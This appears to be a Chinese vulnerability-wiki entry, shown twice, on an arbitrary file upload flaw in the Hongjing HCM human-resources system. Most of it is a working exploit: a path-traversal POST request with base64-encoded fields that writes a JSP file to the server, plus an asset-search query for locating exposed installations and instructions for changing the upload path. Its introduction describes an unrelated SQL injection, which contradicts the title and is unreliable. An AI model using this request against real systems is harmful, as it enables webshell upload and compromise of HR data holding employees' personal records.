fofamini-wiki

登录白背景

源码

宏景人力资源信息管理系统customreport存在任意文件上传漏洞

一、漏洞简介

宏景人力资源信息管理系统是一款全面覆盖人力资源管理各模块的软件，旨在帮助企事业单位构建高绩效组织，推动组织健康成长，提升组织软实力。系统功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理，以及人事、绩效、培训、招聘、考勤等业务自助，还具备报表功能和灵活的表格工具，支持集团管控、目标管理、领导决策等应用。宏景人力资源信息管理系统trainplan_tree存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

宏景人力资源信息管理系统

三、资产测绘

hunterapp.name="宏景 HCM"
特征

四、漏洞复现

POST /w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/OfficeServer.jsp HTTP/1.1
Host: 
Cookie: JSESSIONID=C92F3ED039AAF958516349D0ADEE426E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 417

DBSTEP V3.0     351             0               666             DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
FILETYPE=Li5cMW5kZXguanNw
RECOR1DID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=6

<% out.print("123");%>

上传文件位置

/1ndex.jsp

FILETYPE参数为文件上传的路径与文件名，可用base64编码自定义

Li5cMW5kZXguanNw

原文: https://www.yuque.com/xiaokp7/ocvun2/vyb17ch7v71gfz3n

# 宏景人力资源信息管理系统customreport存在任意文件上传漏洞

# 一、漏洞简介
宏景人力资源信息管理系统是一款全面覆盖人力资源管理各模块的软件，旨在帮助企事业单位构建高绩效组织，推动组织健康成长，提升组织软实力。系统功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理，以及人事、绩效、培训、招聘、考勤等业务自助，还具备报表功能和灵活的表格工具，支持集团管控、目标管理、领导决策等应用。宏景人力资源信息管理系统trainplan_tree存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

# 二、影响版本

- 宏景人力资源信息管理系统

# 三、资产测绘

- hunter`app.name="宏景 HCM"`
- 特征![image.png](./img/08WlpUFM6EJlIB2a/1702368984886-bd83145b-caba-4fdc-9916-c5473e122d40-247428.png)

# 四、漏洞复现
```
POST /w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/OfficeServer.jsp HTTP/1.1
Host: 
Cookie: JSESSIONID=C92F3ED039AAF958516349D0ADEE426E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 417

DBSTEP V3.0     351             0               666             DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
FILETYPE=Li5cMW5kZXguanNw
RECOR1DID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=6

<% out.print("123");%>
```
![image.png](./img/08WlpUFM6EJlIB2a/1706191956531-becb295c-a74a-41cf-8f5a-088ac40e9ad9-379337.png)
上传文件位置
```
/1ndex.jsp
```
![image.png](./img/08WlpUFM6EJlIB2a/1706191989016-d7702d29-3b8f-4da5-a44d-bc2ba40c1262-568515.png)
FILETYPE参数为文件上传的路径与文件名，可用base64编码自定义
```
Li5cMW5kZXguanNw
```
![image.png](./img/08WlpUFM6EJlIB2a/1706192031333-6357aff1-2911-4cb8-bd9f-cc25e2a6603b-781122.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vyb17ch7v71gfz3n>